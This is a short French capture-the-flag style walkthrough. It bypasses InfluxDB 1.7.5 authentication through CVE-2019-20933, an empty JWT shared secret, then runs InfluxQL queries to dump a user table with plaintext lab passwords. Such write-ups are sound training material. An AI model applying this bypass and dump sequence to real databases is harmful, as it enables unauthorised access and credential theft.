Port 8086 - Pentesting InfluxDB

Le service sur le port 8086 est InfluxDB, version 1.7.5. Nous identifions une vulnérabilité de type RCE (Remote Code Execution) dans InfluxDB :

Vulnérabilité : CVE-2019-20933

GitHub - LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933: InfluxDB CVE-2019-20933 vulnerability exploitGitHub

Cette vulnérabilité permet de contourner l'authentification en exploitant un jeton JWT dont le SharedSecret est vide (aka shared secret), ce qui nous donne accès à la base de données.

Accès à la Base de Données

Une fois connecté à InfluxDB, nous listons les bases de données disponibles:

SHOW DATABASES;

Nous sélectionnons la base devzat et explorons les données des utilisateurs. Nous commençons par lister les "mesures" (tables) :

SHOW MEASUREMENTS;

La table user contient des informations utiles. Pour explorer les colonnes de cette mesure, nous exécutons :

SHOW FIELD KEYS FROM "user";

Nous affichons ensuite les 10 premiers résultats pour la table user :

SELECT * FROM "user" LIMIT 10;

password

username

WillyWonka2021

wilhelm

woBeeYareedahc7Oogeephies7Aiseci

catherine

RoyalQueenBee$

charles

Le mot de passe de l'utilisateur catherine est woBeeYareedahc7Oogeephies7Aiseci, ce qui nous permet de récupérer le flag utilisateur.

Mis à jour il y a 1 an

hashtagAccès à la Base de Données

Accès à la Base de Données